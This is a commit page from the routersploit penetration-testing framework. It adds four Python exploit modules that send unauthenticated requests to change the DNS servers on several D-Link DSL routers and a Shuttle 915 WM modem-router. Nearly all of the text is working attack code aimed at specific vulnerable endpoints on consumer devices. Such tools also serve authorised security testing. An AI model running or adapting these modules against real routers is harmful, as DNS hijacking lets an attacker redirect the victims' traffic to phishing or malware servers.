Skip to content

R
routersploit
Commit 830f5c8a by Marcin Bury
Options

Adding exploits that change DNS settings.

parent bf595cbd
Showing with 251 additions and 0 deletions
routersploit/modules/exploits/dlink/dsl_2640b_dns_change.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DSL-2640B DNS Change vulnerability.
If the target is vulnerable it possible to change dns settings"
"""
__info__ = {
'name': 'D-Link DSL-2640B DNS Change',
'description': 'Module exploits D-Link DSL-2640B dns change vulnerability.'
'If the target is vulnerable it is possible to change dns settings.',
'authors': [
'Todor Donev <todor.doven[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/36105/',
'https://github.com/jh00nbr/Routerhunter-2.0',
],
'devices': [
'D-Link DSL-2640B',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
@mute
def check(self):
# it is not possible to check if the target is vulnerable without exploiting device (changing dns)
return None
routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DSL-2780B, DSL-2730B and DSL-526B DNS Change vulnerability.
If the target is vulnerable it possible to change dns settings"
"""
__info__ = {
'name': 'D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change',
'description': 'Module exploits D-Link DSL-2780B, DSL-2730B and DSL-526B dns change vulnerability.'
'If the target is vulnerable it is possible to change dns settings.',
'authors': [
'Todor Donev <todor.doven[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/37237/',
'https://github.com/jh00nbr/Routerhunter-2.0',
],
'devices': [
'D-Link DSL-2780B',
'D-Link DSL-2730B',
'D-Link DSL-526B',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
@mute
def check(self):
# it is not possible to check if the target is vulnerable without exploiting device (changing dns)
return None
routersploit/modules/exploits/dlink/dsl_2740r_dns_change.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for D-Link DSL-2740R DNS Change vulnerability.
If the target is vulnerable it possible to change dns settings"
"""
__info__ = {
'name': 'D-Link DSL-2740R DNS Change',
'description': 'Module exploits D-Link DSL-2740R dns change vulnerability.'
'If the target is vulnerable it is possible to change dns settings.',
'authors': [
'Todor Donev <todor.doven[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/35917/',
'https://github.com/jh00nbr/Routerhunter-2.0',
],
'devices': [
'D-Link DSL-2740R',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
@mute
def check(self):
# it is not possible to check if the target is vulnerable without exploiting device (changing dns)
return None
routersploit/modules/exploits/shuttle/915wm_dns_change.py 0 → 100644
from routersploit import (
exploits,
print_error,
print_status,
print_info,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Shuttle Tech ADSL Modem-Router 915 WM DNS Change vulnerability.
If the target is vulnerable it possible to change dns settings"
"""
__info__ = {
'name': 'Shuttle 915 WM DNS Change',
'description': 'Module exploits Shuttle Tech ADSL Modem-Router 915 WM dns change vulnerability.'
'If the target is vulnerable it is possible to change dns settings.',
'authors': [
'Todor Donev <todor.doven[at]gmail.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/35995/',
'https://github.com/jh00nbr/Routerhunter-2.0',
],
'devices': [
'Shuttle Tech ADSL Modem-Router 915 WM',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1".format(self.target,
self.port,
self.dns1,
self.dns2)
print_status("Attempting to change DNS settings...")
print_status("Primary DNS: {}".format(self.dns1))
print_status("Secondary DNS: {}".format(self.dns2))
response = http_request(method="POST", url=url)
if response is None:
return
if response.status_code == 200:
print_success("DNS settings has been changed")
else:
print_error("Could not change DNS settings")
@mute
def check(self):
# it is not possible to check if the target is vulnerable without exploiting device (changing dns)
return None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment